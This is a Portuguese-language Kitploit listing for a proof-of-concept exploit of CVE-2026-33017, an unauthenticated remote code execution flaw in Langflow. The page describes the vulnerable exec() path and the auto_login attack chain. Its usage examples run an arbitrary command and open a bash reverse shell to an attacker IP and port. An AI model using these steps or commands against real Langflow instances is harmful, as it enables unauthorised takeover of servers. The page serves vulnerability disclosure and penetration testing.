Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — A vulnerabilidade no Langflow 1.8.1 e versões anteriores permite que um atacante remoto não autenticado execute comandos arbitrários no host. | Kitploit
Ferramentas/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

A vulnerabilidade no Langflow 1.8.1 e versões anteriores permite que um atacante remoto não autenticado execute comandos arbitrários no host.

Ver Repositório
117há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33017-Langflow-RCE-PoC

A vulnerabilidade no Langflow 1.8.1 e versões anteriores permite que um atacante remoto e não autenticado execute comandos arbitrários no host.

Descrição

O endpoint POST /api/v1/build_public_tmp/{flow_id}/flow permite que qualquer pessoa crie flows públicos sem autenticação.

Ao fornecer o parâmetro opcional data, um atacante pode substituir o flow armazenado por sua própria definição personalizada, incorporando código Python arbitrário nas configurações dos nós. Esse código controlado pelo usuário é executado via exec() sem sandboxing ou validação, resultando em execução remota de código não autenticada.

Versões Afetadas

Langflow 1.8.1 e versões anteriores

Recursos

  • Criação de um flow público se AUTO_LOGIN=true
  • Execução do Exploit: Executa comandos arbitrários.
  • Reverse Shell: Inicia um reverse shell baseado em bash.

Pré-requisitos

  • A instância do Langflow alvo possui pelo menos um flow público (comum em demos, chatbots ou workflows compartilhados)
  • O UUID de um flow público (pode ser obtido a partir de links/URLs compartilhados)
  • Nenhuma autenticação é necessária

Quando AUTO_LOGIN=true (configuração padrão), um atacante não autenticado pode satisfazer todas as condições:

  • GET /api/v1/auto_login → obter um token de superusuário
  • POST /api/v1/flows/ → criar um flow público
  • Acionar o exploit via build_public_tmp sem qualquer autenticação

Uso

python cve-2026-33017.py <host> [opções]

Opções:

-p PORT, --port PORT: Porta SSH (padrão: 7860)

-id FLOW_ID, --flow_id FLOW_ID: ID do Flow Público (um novo será criado se omitido)

-c COMMAND, --command COMMAND: Comando personalizado a ser executado

--shell: Iniciar um reverse shell

--lhost LHOST: IP do atacante para o reverse shell

--lport LPORT: Porta do atacante para o reverse shell (padrão: 4444)

-t TIMEOUT, --timeout TIMEOUT: Tempo limite de conexão em segundos (padrão: 5)

Exemplos:

Executar um comando:

python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'

Iniciar um reverse shell:

python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Referências

GitHub Advisory

NVD CVE-2026-33017

Medium

⚠️ Aviso Legal

Este PoC é apenas para fins educacionais e de pesquisa. Use por sua conta e risco. O autor não é responsável por qualquer uso indevido ou dano causado.

Baixar ferramenta